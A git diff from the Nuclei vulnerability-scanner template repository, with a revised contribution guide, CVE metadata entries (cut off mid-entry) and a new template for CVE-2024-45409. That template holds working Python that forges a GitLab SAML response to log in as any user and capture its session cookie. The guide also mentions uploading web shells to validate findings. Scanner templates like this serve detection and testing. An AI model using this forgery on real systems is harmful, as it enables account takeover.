diff --git a/.github/workflows/cve2json.yml b/.github/workflows/cve2json.yml index f8c1c0e4d6..69b3a32e19 100644 --- a/.github/workflows/cve2json.yml +++ b/.github/workflows/cve2json.yml @@ -17,7 +17,7 @@ jobs: - uses: projectdiscovery/actions/setup/go@v1 with: go-version: 'stable' - - run: go run main.go $GITHUB_WORKSPACE/http/cves/,$GITHUB_WORKSPACE/network/cves/ $GITHUB_WORKSPACE/cves.json + - run: go run main.go $GITHUB_WORKSPACE/http/cves/,$GITHUB_WORKSPACE/network/cves/,$GITHUB_WORKSPACE/javascript/cves/ $GITHUB_WORKSPACE/cves.json working-directory: .github/scripts/yaml2json - run: md5sum cves.json | cut -d' ' -f1 > cves.json-checksum.txt - uses: projectdiscovery/actions/setup/git@v1 diff --git a/.new-additions b/.new-additions index 94c5807b05..8cdeb9b61f 100644 --- a/.new-additions +++ b/.new-additions @@ -1 +1,24 @@ +code/cves/2024/CVE-2024-45409.yaml +http/cves/2017/CVE-2017-5871.yaml +http/cves/2019/CVE-2019-19411.yaml http/cves/2021/CVE-2021-25094.yaml +http/cves/2024/CVE-2024-32964.yaml +http/cves/2024/CVE-2024-43160.yaml +http/cves/2024/CVE-2024-43917.yaml +http/cves/2024/CVE-2024-45440.yaml +http/cves/2024/CVE-2024-46627.yaml +http/cves/2024/CVE-2024-5488.yaml +http/cves/2024/CVE-2024-6517.yaml +http/cves/2024/CVE-2024-7354.yaml +http/cves/2024/CVE-2024-7714.yaml +http/cves/2024/CVE-2024-8877.yaml +http/default-logins/datagerry/datagerry-default-login.yaml +http/exposed-panels/gitlab-saml.yaml +http/exposed-panels/riello-netman204-panel.yaml +http/miscellaneous/seized-site.yaml +http/misconfiguration/microsoft/aspnetcore-dev-env.yaml +http/technologies/arcgis-detect.yaml +http/technologies/vertigis-detect.yaml +http/technologies/wiki-js-detect.yaml +http/token-spray/api-intigriti.yaml +http/vulnerabilities/retool/retool-svg-xss.yaml diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index 081d422cf7..2f06d9f610 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -1,26 +1,70 @@ -# Template Contribution Guidelines +# Nuclei Contribution Guide +Templates are the core of the [nuclei scanner](https://github.com/projectdiscovery/nuclei) which powers the actual scanning engine. The Nuclei Templates repository stores and houses various templates for a variety of protocols, including TCP, DNS, HTTP, SSL, File, Whois, Websocket, Headless etc. for the scanner provided by our team, as well as contributed by the community. -This documentation contains a set of guidelines to help you during the contribution process. -We are happy to welcome all the contributions from anyone willing to **improve/add** new **templates** to this project. -Thank you for helping out and remember, **no contribution is too small.** +We have over **9000+** templates contributed by **more than 800** security researchers and engineers. We hope that you contribute by sending templates via **pull requests** or [Github issues](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) to grow the list. By contributing, you won't only help the community **❤️** but can also gain experience, increase community and peer recognition, improving your job prospects -# Submitting Nuclei Templates 👩‍💻👨‍💻 +This documentation contains a set of guidelines to help you during the contribution process. We are happy to welcome all the contributions from anyone willing to **improve/add** new **templates** to this project. Thank you for helping out and remember, **no contribution is too small.** -Below you will find the process and workflow used to review and merge your changes. +## **How Can I Contribute?** -## Step 1 : Find existing templates +- [Submitting Nuclei Templates](#Submitting-Nuclei-Templates) +- [Reporting False Negative Template](#Reporting-False-Positive-Template) +- [Reporting False Positive Template](#Reporting-False-Positive-Template) +- [Enhancing existing templates](#Enhancing-existing-templates) +- [Reporting Invalid templates](#Reporting-Invalid-templates) +- [Request Template](#Request-Template) +- [Sharing idea / feature for nuclei-templates](#Sharing-idea-/-feature-for-nuclei-templates) -- Take a look at the [Existing Templates](https://github.com/projectdiscovery/nuclei-templates) before creating new one. -- Take a look at Existing Templates in [GitHub Issues](https://github.com/projectdiscovery/nuclei-templates/issues) and [Pull Request](https://github.com/projectdiscovery/nuclei-templates/pulls) section to avoid duplicate work. -- Take a look at [Templates](https://nuclei.projectdiscovery.io/templating-guide/) and [Matchers](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers) Guideline for creating new template. +### **Submitting Nuclei Templates** -## Step 2 : Fork the Project +**Before Submitting an Issue or Pull Request** -- Fork this Repository. This will create a Local Copy of this Repository on your Github Profile. Keep a reference to the original project in `upstream` remote. +- Take a look at the [Existing Templates](https://github.com/projectdiscovery/nuclei-templates) or search for endpoints before creating new one. +- Take a look at Existing Templates in [GitHub Issues](https://github.com/projectdiscovery/nuclei-templates/issues) and [Pull Request](https://github.com/projectdiscovery/nuclei-templates/pulls) section to avoid duplicate work. +- Take a look at [Templates](https://nuclei.projectdiscovery.io/templating-guide/) and [Matchers](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers) Guideline for creating new template. +Along with the P.O.C following are the required fields in the info section for submitting new template. + +1. `id`: It should be short ideally max of 3-4 words. For example `grafana-unauth-rce` +2. `name` : The name should be short in this format ` - ` +3. `author`: It can be your github/twitter username or alias. You can also create a PR to add more details associated with the author name here (https://github.com/projectdiscovery/nuclei-templates/blob/main/contributors.json) +4. `severity` : Based on the CVSS score but can vary based on the exploit and real-world impact +5. `description` : Short description of the vulnerability +6. `reference` : Please provide the reference to the POC, setup guide or the product details to help the team verify the template. + +**Do’s** + +- If you have verified the template, mark it as `verified: true` under metadata field and share the debug data using `-debug` flag after redacting the vulnerable server information in the PR +- Make sure to add more than one matcher to prevent false positive results. Avoid short word that could be encountered anywhere +- If possible submit the vulnerable environment based on docker-compose. For example: https://github.com/vulhub/vulhub. +- We only accept templates with complete P.O.Cs instead of just detection based on version + +**Don’t** + +- Don’t not share any real world target on the PR. If you have setup an vulnerable environment please share it privately on Discord with the team to easily validate the template. +- Avoid submitting templates with weak matchers. For example: Adding GET/POST data as the matchers in the template, as it can result in false positive results on few hosts +- Don’t make unnecessary changes to the existing templates like adding more requests to the templates when the existing requests or paths are good enough to verify that the bug exists +- Try to keep the requests per template as low as possible + +**Best Practices** + +- Make sure to add the template in the appropriate directory. +- Add part with the matchers. For example if the matcher is in response body add `part:` body +- Use `cmd` variable for RCE templates so that they are unified throughout the repo +- Use `{{username}}` and `{{password}}` variables in all authenticated templates +- Use `{{token}}` variable in all the template that deals with keys or tokens +- If there are more than 1 template for a tech create a separate folder for it +- Don't share any vulnerable URL publicly on Github or Discord channel. +- We should only upload a web shell as a last resort to validate the vulnerability, and if we do upload a file, make sure the file name is random(`{{randstr}}`) + +### **Submitting a PR** + +**Fork the Project** + +- This will create a Local Copy of this Repository on your Github Profile. Keep a reference to the original project in `upstream` remote. template-fork -```sh +```jsx git clone https://github.com//nuclei-templates cd nuclei-templates git remote add upstream https://github.com/projectdiscovery/nuclei-templates @@ -28,73 +72,132 @@ git remote add upstream https://github.com/projectdiscovery/nuclei-templates - If you have already forked the project, update your copy before working. -```sh +```jsx git remote update git checkout main git rebase upstream/main ``` -## Step 3 : Create your Template Branch +**Create your Template Branch** -Create a new branch. Use its name to identify the issue your addressing. +- Create a new branch. Use its name to identify the issue your addressing. -```sh +```jsx # It will create a new branch with name template_branch_name and switch to that branch git checkout -b template_branch_name ``` -## Step 4 : Create Template and Commit +**Create Template and Commit** + - Create your template. - Add all the files/folders needed. - After you've made changes or completed template creation, add changes to the branch you've just created by: -```sh +```jsx # To add all new files to branch template_branch_name git add . ``` - To commit, give a descriptive message for the convenience of the reviewer by: -```sh +```jsx # This message get associated with all files you have changed git commit -m "Added/Fixed/Updated XXX Template" ``` **NOTE**: -- A Pull Request should have only one unique template to make it simple for review. -- Multiple templates for same technology can be grouped into single Pull Request. +- Try to add only one templates per Pull Request as it will make it simple for us to review and the PR will not be blocked because of one of the templates +- Multiple templates for same technology can be grouped into single Pull Request. - -## Step 5 : Push Your Changes +**Push Your Changes** - Now you are ready to push your template to the remote (forked) repository. - When your work is ready and complies with the project conventions, upload your changes to your fork: -```sh +```jsx # To push your work to your remote repository git push -u origin template_branch_name ``` -## Step 6 : Pull Request +**Pull Request** - Fire up your favorite browser, navigate to your GitHub repository, then click on the New pull request button within the Pull requests tab. Provide a meaningful name and description to your pull request, that describes the purpose of the template. - Voila! Your Pull Request has been submitted. It will be reviewed and merged by the moderators, if it complies with project standards, otherwise a feedback will be provided.🥳 -## Need more help?🤔 +### Reporting [False Negative Template](https://github.com/projectdiscovery/nuclei-templates/issues/new?template=false-negative.yml) -You can refer to the following articles of Git and GitHub basics. In case you are stuck, feel free to contact the Project Mentors and Community by joining [PD Community](https://discord.gg/projectdiscovery) Discord server. +You can contribute to the project by creating issue/PR for templates which are missing valid/expected result. -- [Forking a Repo](https://help.github.com/en/github/getting-started-with-github/fork-a-repo) -- [Cloning a Repo](https://help.github.com/en/desktop/contributing-to-projects/creating-an-issue-or-pull-request) -- [How to create a Pull Request](https://opensource.com/article/19/7/create-pull-request-github) -- [Getting started with Git and GitHub](https://towardsdatascience.com/getting-started-with-git-and-github-6fcd0f2d4ac6) -- [Learn GitHub from Scratch](https://lab.github.com/githubtraining/introduction-to-github) +- Share you nuclei version and the path of the template +- Share the `-debug` data for the host where the template is not matching the vulnerable target +- If possible share the improved or valid matchers, references and the information to setup vulnerable environment. +> Note: If host information can not be shared publicly, please reach out to us on discord server in DM. +> -## Tip from us😇 +**Creating a [False negative issue](https://github.com/projectdiscovery/nuclei-templates/issues/new?template=false-negative.yml) or Submit a PR** -- **Nuclei** outcomes are only as excellent as **template matchers💡** -- Declare at least two matchers to reduce false positive -- Avoid matching words reflected in the URL to reduce false positive -- Avoid short word that could be encountered anywhere +- Click on the Issues Tab and then click on `new issue.` +- Click on `get started` in front of **`False Negative`** + +### Reporting [False Positive Template](https://github.com/projectdiscovery/nuclei-templates/issues/new?template=false-positive.yml) + +You can contribute to the project by creating issue/PR for templates which are producing invalid/unexpected result. + +- Share you nuclei version and the path of the template +- Share the `-debug` data and if possible the host where the template is matching the non-vulnerable target and producing invalid/unexpected result. +- If possible share the improved or valid matchers and reference to the vulnerability. + +**Creating a [False positive issue](https://github.com/projectdiscovery/nuclei-templates/issues/new?template=false-positive.yml) or Submit a PR** + +- Click on the Issues Tab and then click on `new issue.` +- Click on `get started` in front of **`False Positive`** + +### Enhancing existing templates + +You can contribute to the project by creating issue/PR for enhancement of nuclei-templates repository which includes changing directory structure, adding new categories or fields to the templates etc + +Share the reason or requirement for the enhancement and how can it improve the overall quality of the template(s). + +**Creating a Issue for Suggesting Enhancements or Submit a PR** + +- Click on the Issues Tab and then click on `new issue` +- Click on `get started` in front of `Enhancement request` + +### Reporting Invalid templates + +If you have encountered some invalid template or any template in the repo resulting in unexpected errors then please report it as invalid template. Make sure to provide the following info: + +- Share you nuclei version and the path of the template +- Share the screenshot with the error and the `-verbose` output and if applicable also provide the debug data using `-debug` flag +- If this is specific to one environment and the bug don’t exist on the other setup please provide the OS and details your setup + +**Creating a Issue for reporting Invalid template** + +- Click on the Issues Tab and then click on `new issue` +- Click on `get started` in front of `Report Issue` + +### Request Template + +If you have a reference to the POC of any vulnerbaility or new CVE. You can create an issue to template the template and the team will create one. Make sure to provide the following info: + +- Reference to the vulnerability with the complete P.O.C +- If possible share the vulnerable docker image or steps to setup vulnerable environment + +> Note: If have setup the vulnerable environment. You can share the host with the team on discord server in DM. +> + +**Creating a Issue for requesting nuclei template** + +- Click on the Issues Tab and then click on `new issue` +- Click on `get started` in front of `Request Template` + +### Sharing idea / feature for nuclei-templates + +If you have any ideas or want to request a feature for nuclei-templates you can do so by creating a new discussion. + +**Creating a Discussion for sharing idea / feature** + +- Click on the Issues Tab and then click on `new issue` +- Click on `open` in front of `Share idea / feature to discuss for nuclei-templates` diff --git a/code/cves/2024/CVE-2024-45409.yaml b/code/cves/2024/CVE-2024-45409.yaml new file mode 100644 index 0000000000..74e2e511a1 --- /dev/null +++ b/code/cves/2024/CVE-2024-45409.yaml @@ -0,0 +1,124 @@ +id: CVE-2024-45409 + +info: + name: GitLab - SAML Authentication Bypass + author: iamnoooob,rootxharsh,pdresearch + severity: critical + description: | + The Ruby SAML library is for implementing the client side of a SAML authorization. Ruby-SAML in <= 12.2 and 1.13.0 <= 1.16.0 does not properly verify the signature of the SAML Response. + impact: | + An unauthenticated attacker with access to any signed saml document (by the IdP) can thus forge a SAML Response/Assertion with arbitrary contents. This would allow the attacker to log in as arbitrary user within the vulnerable system. + remediation: | + This vulnerability is fixed in 1.17.0 and 1.12.3. + reference: + - https://about.gitlab.com/releases/2024/09/17/patch-release-gitlab-17-3-3-released/ + - https://github.com/omniauth/omniauth-saml/security/advisories/GHSA-cvp8-5r8g-fhvq + - https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-jw9c-mfg7-9rx2 + - https://blog.projectdiscovery.io/ruby-saml-gitlab-auth-bypass/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-45409 + cwe-id: CWE-347 + metadata: + verified: true + shodan-query: http.title:"GitLab" + product: gitlab + vendor: gitlab + tags: cve,cve2024,saml,auth-bypass,gitlab,code + +code: + - engine: + - py + - python3 # requires python to be pre-installed on system running nuclei + source: | + try: + from lxml import etree + except ImportError: + raise ImportError("The 'lxml' library is not installed. Please install it using 'pip install lxml'.") + import hashlib,os + import base64 + from datetime import datetime, timedelta + import urllib.parse + import requests + username = os.getenv('username') + if not username: + username='admin@example.com' + saml_response = os.getenv('SAMLResponse') + xml_content = base64.b64decode(urllib.parse.unquote(saml_response)) + parser = etree.XMLParser(remove_blank_text=True) + root = etree.fromstring(xml_content, parser) + + namespaces = { + 'samlp': 'urn:oasis:names:tc:SAML:2.0:protocol', + 'saml': 'urn:oasis:names:tc:SAML:2.0:assertion', + 'ds': 'http://www.w3.org/2000/09/xmldsig#' + } + + response_signature = root.find('./ds:Signature', namespaces) + if response_signature is not None: + root.remove(response_signature) + + nameid = root.find( + './/saml:NameID', + namespaces + ) + if nameid is not None: + nameid.text = username + + attribute_values = root.findall('.//saml:AttributeValue', namespaces) + for attr_value in attribute_values: + attr_value.text = username + + assertion = root.find('.//saml:Assertion', namespaces) + if assertion is not None: + # Create a deep copy of the assertion for digest calculation + assertion_copy = etree.fromstring(etree.tostring(assertion)) + signature_in_assertion = assertion_copy.find('.//ds:Signature', namespaces) + if signature_in_assertion is not None: + signature_in_assertion.getparent().remove(signature_in_assertion) + canonicalized_assertion = etree.tostring( + assertion_copy, method='c14n', exclusive=True, with_comments=False + ) + digest = hashlib.sha256(canonicalized_assertion).digest() + digest_value = base64.b64encode(digest).decode() + else: + digest_value = '' + + issuer = root.find('.//saml:Issuer', namespaces) + if issuer is not None: + parent = issuer.getparent() + index = parent.index(issuer) + extensions = etree.Element('{urn:oasis:names:tc:SAML:2.0:protocol}Extensions') + digest_element = etree.SubElement( + extensions, '{http://www.w3.org/2000/09/xmldsig#}DigestValue' + ) + digest_element.text = digest_value + parent.insert(index + 1, extensions) + + malformed_samlresponse = urllib.parse.quote(base64.b64encode((etree.tostring( + root, pretty_print=False, xml_declaration=True, encoding='UTF-8' + )))) + print(malformed_samlresponse) + +http: + - raw: + - | + POST /users/auth/saml/callback HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + RelayState=undefined&SAMLResponse={{code_response}} + + matchers: + - type: dsl + dsl: + - 'contains(header,"known_sign_in")' + - 'status_code == 302' + condition: and + + extractors: + - type: kval + kval: + - _gitlab_session +# digest: 4b0a00483046022100aac3014dc61bab8223d36c1bd10f19aa4886b33778e2b16cf891fce7f7c24bee022100a42cd0b25c8f4a54304541ca26f508284772b55881c43962eb396092205425ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cves.json b/cves.json index a177afd8da..9d19047eda 100644 --- a/cves.json +++ b/cves.json @@ -467,6 +467,7 @@ {"ID":"CVE-2017-5631","Info":{"Name":"KMCIS CaseAware - Cross-Site Scripting","Severity":"medium","Description":"KMCIS CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-5631.yaml"} {"ID":"CVE-2017-5638","Info":{"Name":"Apache Struts 2 - Remote Command Execution","Severity":"critical","Description":"Apache Struts 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 is susceptible to remote command injection attacks. The Jakarta Multipart parser has incorrect exception handling and error-message generation during file upload attempts, which can allow an attacker to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header. This was exploited in March 2017 with a Content-Type header containing a #cmd= string.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2017/CVE-2017-5638.yaml"} {"ID":"CVE-2017-5689","Info":{"Name":"Intel Active Management - Authentication Bypass","Severity":"critical","Description":"Intel Active Management platforms are susceptible to authentication bypass. A non-privileged network attacker can gain system privileges to provisioned Intel manageability SKUs: Intel Active Management Technology (AMT) and Intel Standard Manageability. A non-privileged local attacker can provision manageability features, gaining unprivileged network or local system privileges on Intel manageability SKUs: Intel Active Management Technology, Intel Standard Manageability, and Intel Small Business Technology. The issue has been observed in versions 6.x, 7.x, 8.x 9.x, 10.x, 11.0, 11.5, and 11.6 for all three platforms. Versions before 6 and after 11.6 are not impacted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2017/CVE-2017-5689.yaml"} +{"ID":"CVE-2017-5871","Info":{"Name":"Odoo \u003c= 8.0-20160726 \u0026 9.0 - Open Redirect","Severity":"medium","Description":"An Open Redirect vulnerability in Odoo versions \u003c= 8.0-20160726 and 9.0. This issue allows an attacker to redirect users to untrusted sites via a crafted URL.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2017/CVE-2017-5871.yaml"} {"ID":"CVE-2017-5982","Info":{"Name":"Kodi 17.1 - Local File Inclusion","Severity":"high","Description":"Kodi 17.1 is vulnerable to local file inclusion vulnerabilities because of insufficient validation of user input.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2017/CVE-2017-5982.yaml"} {"ID":"CVE-2017-6090","Info":{"Name":"PhpColl 2.5.1 Arbitrary File Upload","Severity":"high","Description":"PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/ via clients/editclient.php.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2017/CVE-2017-6090.yaml"} {"ID":"CVE-2017-7269","Info":{"Name":"Windows Server 2003 \u0026 IIS 6.0 - Remote Code Execution","Severity":"critical","Description":"Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 contains a buffer overflow vulnerability in the ScStoragePathFromUrl function in the WebDAV service that could allow remote attackers to execute arbitrary code via a long header beginning with \"If \u003chttp://\" in a PROPFIND request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2017/CVE-2017-7269.yaml"} @@ -748,6 +749,7 @@ {"ID":"CVE-2019-1898","Info":{"Name":"Cisco RV110W RV130W RV215W Router - Information leakage","Severity":"medium","Description":"A vulnerability in the web-based management interface of Cisco RV110W, RV130W, and RV215W Routers could allow an unauthenticated, remote attacker to access the syslog file on an affected device. The vulnerability is due to improper authorization of an HTTP request. An attacker could exploit this vulnerability by accessing the URL for the syslog file. A successful exploit could allow the attacker to access the information contained in the file.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2019/CVE-2019-1898.yaml"} {"ID":"CVE-2019-19134","Info":{"Name":"WordPress Hero Maps Premium \u003c=2.2.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Hero Maps Premium plugin 2.2.1 and prior contains an unauthenticated reflected cross-site scripting vulnerability via the views/dashboard/index.php p parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-19134.yaml"} {"ID":"CVE-2019-19368","Info":{"Name":"Rumpus FTP Web File Manager 8.2.9.1 - Cross-Site Scripting","Severity":"medium","Description":"Rumpus FTP Web File Manager 8.2.9.1 contains a reflected cross-site scripting vulnerability via the Login page. An attacker can send a crafted link to end users and can execute arbitrary JavaScript.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-19368.yaml"} +{"ID":"CVE-2019-19411","Info":{"Name":"Huawei Firewall - Local File Inclusion","Severity":"low","Description":"USG9500 with versions of V500R001C30SPC100, V500R001C30SPC200, V500R001C30SPC600, V500R001C60SPC500, V500R005C00SPC100, V500R005C00SPC200 have an information leakage vulnerability. Due to improper processing of the initialization vector used in a specific encryption algorithm, an attacker who gains access to this cryptographic primitive may exploit this vulnerability to cause the value of the confidentiality associated with its use to be diminished.\n","Classification":{"CVSSScore":"3.7"}},"file_path":"http/cves/2019/CVE-2019-19411.yaml"} {"ID":"CVE-2019-1943","Info":{"Name":"Cisco Small Business 200,300 and 500 Series Switches - Open Redirect","Severity":"medium","Description":"Cisco Small Business 200,300 and 500 Series Switches contain an open redirect vulnerability in the Web UI. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-1943.yaml"} {"ID":"CVE-2019-19781","Info":{"Name":"Citrix ADC and Gateway - Directory Traversal","Severity":"critical","Description":"Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0 are susceptible to directory traversal vulnerabilities.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-19781.yaml"} {"ID":"CVE-2019-19824","Info":{"Name":"TOTOLINK Realtek SD Routers - Remote Command Injection","Severity":"high","Description":"TOTOLINK Realtek SDK based routers may allow an authenticated attacker to execute arbitrary OS commands via the sysCmd parameter to the boafrm/formSysCmd URI, even if the GUI (syscmd.htm) is not available. This allows for full control over the device's internals. This affects A3002RU through 2.0.0, A702R through 2.1.3, N301RT through 2.1.6, N302R through 3.4.0, N300RT through 3.4.0, N200RE through 4.0.0, N150RT through 3.4.0, and N100RE through 3.4.0.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2019/CVE-2019-19824.yaml"} @@ -2521,6 +2523,7 @@ {"ID":"CVE-2024-32709","Info":{"Name":"WP-Recall \u003c= 16.26.5 - SQL Injection","Severity":"critical","Description":"The WP-Recall Registration, Profile, Commerce \u0026 More plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 16.26.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.3"}},"file_path":"http/cves/2024/CVE-2024-32709.yaml"} {"ID":"CVE-2024-3273","Info":{"Name":"D-Link Network Attached Storage - Command Injection and Backdoor Account","Severity":"critical","Description":"UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259284. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3273.yaml"} {"ID":"CVE-2024-3274","Info":{"Name":"D-LINK DNS-320L,DNS-320LW and DNS-327L - Information Disclosure","Severity":"medium","Description":"A vulnerability has been found in D-Link DNS-320L, DNS-320LW and DNS-327L up to 20240403 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /cgi-bin/info.cgi of the component HTTP GET Request Handler.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-3274.yaml"} +{"ID":"CVE-2024-32964","Info":{"Name":"Lobe Chat \u003c= v0.150.5 - Server-Side Request Forgery","Severity":"critical","Description":"Lobe Chat is a chatbot framework that supports speech synthesis, multimodal, and extensible Function Call plugin system. Prior to 0.150.6, lobe-chat had an unauthorized Server-Side Request Forgery vulnerability in the /api/proxy endpoint. An attacker can construct malicious requests to cause Server-Side Request Forgery without logging in, attack intranet services, and leak sensitive information.\n","Classification":{"CVSSScore":"9"}},"file_path":"http/cves/2024/CVE-2024-32964.yaml"} {"ID":"CVE-2024-33113","Info":{"Name":"D-LINK DIR-845L bsc_sms_inbox.php file - Information Disclosure","Severity":"medium","Description":"D-LINK DIR-845L \u003c=v1.01KRb03 is vulnerable to Information disclosurey via bsc_sms_inbox.php.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33113.yaml"} {"ID":"CVE-2024-33288","Info":{"Name":"Prison Management System - SQL Injection Authentication Bypass","Severity":"high","Description":"Sql injection vulnerability was found on the login page in Prison Management System\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33288.yaml"} {"ID":"CVE-2024-33575","Info":{"Name":"User Meta WP Plugin \u003c 3.1 - Sensitive Information Exposure","Severity":"medium","Description":"The User Meta is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0 via the /views/debug.php file. This makes it possible for unauthenticated attackers, with to extract sensitive configuration data.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-33575.yaml"} @@ -2573,9 +2576,11 @@ {"ID":"CVE-2024-41955","Info":{"Name":"Open Redirect in Login Redirect - MobSF","Severity":"medium","Description":"Mobile Security Framework (MobSF) is a security research platform for mobile applications in Android, iOS and Windows Mobile. An open redirect vulnerability exist in MobSF authentication view.\n","Classification":{"CVSSScore":"5.2"}},"file_path":"http/cves/2024/CVE-2024-41955.yaml"} {"ID":"CVE-2024-4257","Info":{"Name":"BlueNet Technology Clinical Browsing System 1.2.1 - Sql Injection","Severity":"medium","Description":"A vulnerability was found in BlueNet Technology Clinical Browsing System 1.2.1. It has been classified as critical. This affects an unknown part of the file /xds/deleteStudy.php. The manipulation of the argument documentUniqueId leads to sql injection. It is possible to initiate the attack remotely.\n","Classification":{"CVSSScore":"6.3"}},"file_path":"http/cves/2024/CVE-2024-4257.yaml"} {"ID":"CVE-2024-4295","Info":{"Name":"Email Subscribers by Icegram Express \u003c= 5.7.20 - Unauthenticated SQL Injection via Hash","Severity":"critical","Description":"Email Subscribers by Icegram Express \u003c= 5.7.20 contains an unauthenticated SQL injection vulnerability via the hash parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-4295.yaml"} +{"ID":"CVE-2024-43160","Info":{"Name":"BerqWP \u003c= 1.7.6 - Arbitrary File Uplaod","Severity":"critical","Description":"The BerqWP Automated All-In-One PageSpeed Optimization Plugin for Core Web Vitals, Cache, CDN, Images, CSS, and JavaScript plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the /api/store_webp.php file in all versions up to, and including, 1.7.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-43160.yaml"} {"ID":"CVE-2024-43425","Info":{"Name":"Moodle - Remote Code Execution","Severity":"critical","Description":"Attackers with the permission to create or modify questions in Moodle courses are able to craft malicious inputs for calculated questions, which can be abused to execute arbitrary commands on the underlying system.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-43425.yaml"} {"ID":"CVE-2024-4348","Info":{"Name":"osCommerce v4.0 - Cross-site Scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in osCommerce 4. Affected is an unknown function of the file /catalog/all-products. The manipulation of the argument cat leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-4348.yaml"} {"ID":"CVE-2024-4358","Info":{"Name":"Progress Telerik Report Server - Authentication Bypass","Severity":"critical","Description":"In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4358.yaml"} +{"ID":"CVE-2024-43917","Info":{"Name":"WordPress TI WooCommerce Wishlist Plugin \u003c= 2.8.2 - SQL Injection","Severity":"critical","Description":"In the latest version (2.8.2 as of writing the article) and below, the plugin is vulnerable to a SQL injection vulnerability that allows any users to execute arbitrary SQL queries in the database of the WordPress site. No privileges are required to exploit the issue. The vulnerability is unpatched on the latest version and is tracked as the CVE-2024-43917.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-43917.yaml"} {"ID":"CVE-2024-44000","Info":{"Name":"LiteSpeed Cache \u003c= 6.4.1 - Sensitive Information Exposure","Severity":"high","Description":"The LiteSpeed Cache plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 6.4.1 through the debug.log file that is publicly exposed. This makes it possible for unauthenticated attackers to view potentially sensitive information contained in the exposed log file. The log file may contain user cookies making it possible for an attacker to log in with any session that is actively valid and exposed in the log file. Note: the debug feature must be enabled for this to be a concern and this feature is disabled by default.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-44000.yaml"} {"ID":"CVE-2024-4434","Info":{"Name":"LearnPress WordPress LMS Plugin \u003c= 4.2.6.5 - SQL Injection","Severity":"critical","Description":"The LearnPress WordPress LMS Plugin plugin for WordPress is vulnerable to time-based SQL Injection via the ‘term_id’ parameter in versions up to, and including, 4.2.6.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already 